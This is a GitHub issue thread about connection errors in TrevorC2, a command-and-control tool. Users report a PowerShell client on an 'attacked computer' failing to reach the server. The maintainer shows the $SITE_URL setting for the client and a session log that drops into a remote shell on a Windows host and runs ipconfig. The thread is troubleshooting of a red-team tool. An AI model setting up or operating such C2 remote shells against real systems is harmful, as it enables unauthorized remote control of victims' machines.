### ISSUE TITLE
Connection error

### ISSUE THREAD

**Issue by PinkPantherX** [trustedsec/trevorc2#22]
tested this Trevor C2 and I get this every few seconds: Received connection from 89.xxx.xx.xx and hostname DESKTOP-QB6T90V with communication sid pwCYUjYqUlhAVlj for TrevorC2.

 Received connection from 89.xxx.xx.xx and hostname DESKTOP-QB6T90V with communication sid pwCYUjYqUlhAVlj for TrevorC2.

 Received connection from 89.xxx.xx.xx and hostname DESKTOP-QB6T90V with communication sid pwCYUjYqUlhAVlj for TrevorC2.

In the powershell window on attacked computer I'm getting error:  Cannot connect to '$SITE_URL'" -
        Write-Host "[*] Trying again in $time seconds..." 

What could be the problem? I've set up my ip in client.ps1 and didn't touch anything else..

**Comment by HackingDave** [comment]
Have you updated to the latest version? This was a issue before but fixed the bug a few weeks ago..

**Comment by PinkPantherX** [comment]
Yes, I downloaded it 5 days ago..

**Comment by HackingDave** [comment]
Hmmm, I don't appear to be able to replicate. That error message is weird on the PowerShell windows side, which usually indicates it's not able to connect to the server but you are getting connections.  I would try to do another git pull to ensure you're running the latest because the multiple attempt connection bug was fixed... Here is what I get from a Windows 10 system below - the PS output is also clean. 

You are defining the $SITE_URL on the PowerShell script correct?

For me for example mine would look like:
```
$SITE_URL = "http://172.16.253.142"
```
Happy to help troubleshoot with you, just don't see anything at this point in my testing..

```
trevorc2>
*** Received connection from 172.16.253.128 and hostname DESKTOP-3VDNDSJ with communication sid iGmGFYXMSvsEoaQ for TrevorC2.

trevorc2>
trevorc2>interact 1

*** interact with DESKTOP-3VDNDSJ iGmGFYXMSvsEoaQ.
[*] Dropping into trevorc2 shell...
[*] Use exit or back to select other shells
DESKTOP-3VDNDSJ:trevorc2>ipconfig
[*] Waiting for command to be executed, be patient, results will be displayed here...
[*] Received response back from client...
=-=-=-=-=-=-=-=-=-=-=
(HOSTNAME: DESKTOP-3VDNDSJ
CLIENT: 172.16.253.128)

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::8984:c775:d798:3b88%15
   IPv4 Address. . . . . . . . . . . : 172.16.253.128
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.253.2

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

DESKTOP-3VDNDSJ:trevorc2>
```

**Comment by PinkPantherX** [comment]
Yes, I checked again, I have the right IP in $SITE_URL in .ps1 file. I'm testing it on my debian10 vps and my home pc. Could vps be an issue? Also, I'm not even getting "Received connection" on my vps anymore..

**Comment by satoshi78** [comment]
Hi Dude,
I tried to install Trevor2 both server and client side with python script.
From the client , I see this error:
"Something went wrong, printing error: HTTP Error 500: Internal Server Error"

Have you some idea about this issue?

Thank you.

**Comment by PinkPantherX** [comment]
No, I have no clue.

**Comment by HackingDave** [comment]
Did you run pip3 install -r requirements.txt ?

**Comment by satoshi78** [comment]
Yes, of course...

Il giorno gio 26 mar 2020 alle ore 17:15 David Kennedy <
notifications@github.com> ha scritto:

**Comment by CyNile** [comment]
> Yes, I downloaded it 5 days ago..

can u help me i still have error cannot connect to server ip try in # seconds what do u do to avoid this error
